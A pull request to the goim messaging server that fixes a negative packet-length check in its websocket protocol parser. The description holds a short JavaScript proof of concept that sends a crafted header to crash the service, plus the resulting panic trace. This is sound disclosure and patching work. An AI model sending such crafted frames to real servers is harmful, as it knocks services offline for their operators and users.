### PR TITLE
fix overflow attack

### DIFF
--- a/api/comet/grpc/protocol.go
+++ b/api/comet/grpc/protocol.go
@@ -159,7 +159,7 @@ func (p *Proto) ReadWebsocket(ws *websocket.Conn) (err error) {
 	p.Ver = int32(binary.BigEndian.Int16(buf[_verOffset:_opOffset]))
 	p.Op = binary.BigEndian.Int32(buf[_opOffset:_seqOffset])
 	p.Seq = binary.BigEndian.Int32(buf[_seqOffset:])
-	if packLen > _maxPackSize {
+	if packLen < 0 || packLen > _maxPackSize {
 		return ErrProtoPackLen
 	}
 	if headerLen != _rawHeaderSize {


### PR DESCRIPTION
I find a not serious message parser can be use to terminate im service  @Terry-Mao 

POC
```
var headerBuf = new ArrayBuffer(rawHeaderLen);
var v = new DataView(headerBuf, 0);
v.setInt32(0, -2147483648);
v.setInt16(4, 16);
v.setInt16(6, 1);
v.setInt32(8, 7);
v.setInt32(12, 1);
ws.send(headerBuf);

panic: runtime error: slice bounds out of range [:-2147483648]

goroutine 1165 [running]:
github.com/Terry-Mao/goim/api/comet/grpc.(*Proto).ReadWebsocket(0xc021a62000, 0xc00000f680, 0xc0102ea000, 0x81)
	/app/api/comet/grpc/protocol.go:169 +0x1f9
github.com/Terry-Mao/goim/internal/comet.(*Server).authWebsocket(0xc0000feaf0, 0xab71a0, 0xc0001cc840, 0xc00000f680, 0xc021a62000, 0x0, 0x0, 0x0, 0x0, 0x0, ...)
	/app/internal/comet/server_websocket.go:410 +0xca
```